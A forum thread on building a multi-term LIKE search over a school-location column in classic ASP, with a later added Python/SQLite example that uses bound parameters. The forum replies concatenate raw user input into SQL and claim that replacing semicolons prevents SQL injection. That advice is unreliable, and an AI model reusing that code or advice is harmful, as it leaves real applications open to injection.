I have a database as
table name: school
field name: location
e.g. data in the location column:
green school,tagore garden,chink road,jammu
I want to make a search on location such that when the user enters
green
green school, tagore
search words should come continuous
Problem:
on entering
green school, jammu
the record does not show.
The search query is
select * from school where location like '%a%'
where a is the variable of the text box.
Also suggest how to protect this text box against SQL injection.
4 3378 @kkshansid
In ASP VBScript, when you are comparing form variables in SQL statements, use them within quotes as shown below:
sql = "select * from school where location like '%" & a & "%'"
Then execute this statement.
Regards,
"D"
e.g. data in the location column:
green school,tagore garden,chink road,jammu
I want to make a search on location such that when the user enters
green
green school, tagore
The problem is that it takes the condition that search words should come continuous.
Problem:
on entering
green school, jammu
the record does not show.
The search query is
sql = "select * from school where location like '%" & a & "%'"
where a is the variable of the text box.
jhardman 3,406
Recognized Expert Specialist @kkshansid
It looks like your grasp of ASP is OK, but the SQL needs to be more complicated. Try splitting the entered data by the space character, and enter each term separately into the SQL like this:
asplit = split(a, " ") 'asplit is now an array of the terms in a
sql = "SELECT * FROM school WHERE "
for each x in asplit
    'one LIKE condition per term, joined with AND
    sql = sql + "location LIKE '%" & x & "%' AND "
next
'sql now ends with "AND " and this needs to be removed
sql = left(sql, len(sql)-4) 'removes the last 4 characters from the string
Try this and let me know if it works.
Jared
jhardman 3,406
Recognized Expert Specialist @kkshansid
In order to protect against SQL injection, you will need to search and replace special characters in your text - the first one that comes to mind is the semi-colon (;) since you need to separate SQL statements with the semicolon. There are a whole bunch of characters it would be good to replace, some people have lists, anyway, the basic replace function looks like this:
searchString = Replace(a, ";", "|")
Jared
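An added example (not code from the thread) covering both replies above: one LIKE condition per search term, with every term passed as a bound parameter instead of being concatenated into the SQL string. It is written in Python against an in-memory SQLite database so that it runs stand-alone; in classic ASP the same pattern uses ADODB.Command parameters. The sample rows and the helper names (`escape_like`, `build_query`, `search`) are constructed for illustration.

```python
import re
import sqlite3

# Constructed sample data, modelled on the row quoted in the question.
ROWS = [
    ("green school,tagore garden,chink road,jammu",),
    ("st. mary's school,canal road,jammu",),
    ("100% kids academy,gandhi nagar,jammu",),
]

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE school (location TEXT)")
    db.executemany("INSERT INTO school (location) VALUES (?)", ROWS)
    return db

def escape_like(term):
    # Make %, _ and the escape character itself literal inside a LIKE pattern.
    return re.sub(r"([\\%_])", r"\\\1", term)

def build_query(text):
    # Split on whitespace and commas so "green school, jammu" gives three terms.
    terms = [t for t in re.split(r"[\s,]+", text) if t]
    if not terms:
        return None, []
    # Only fixed SQL text is concatenated; user input travels in params.
    where = " AND ".join(["location LIKE ? ESCAPE '\\'"] * len(terms))
    params = ["%" + escape_like(t) + "%" for t in terms]
    return "SELECT location FROM school WHERE " + where, params

def search(db, text):
    sql, params = build_query(text)
    if sql is None:
        return []  # empty box: return nothing rather than every row
    return [row[0] for row in db.execute(sql, params)]

if __name__ == "__main__":
    db = make_db()
    for text in ["green school, jammu", "mary's jammu", "%", "school; jammu"]:
        print(repr(text), "->", search(db, text))
```

Because the terms are bound as parameters, an apostrophe or semicolon typed into the box is matched as ordinary text and never becomes part of the statement. Escaping `%` and `_` keeps a term from acting as a match-everything wildcard.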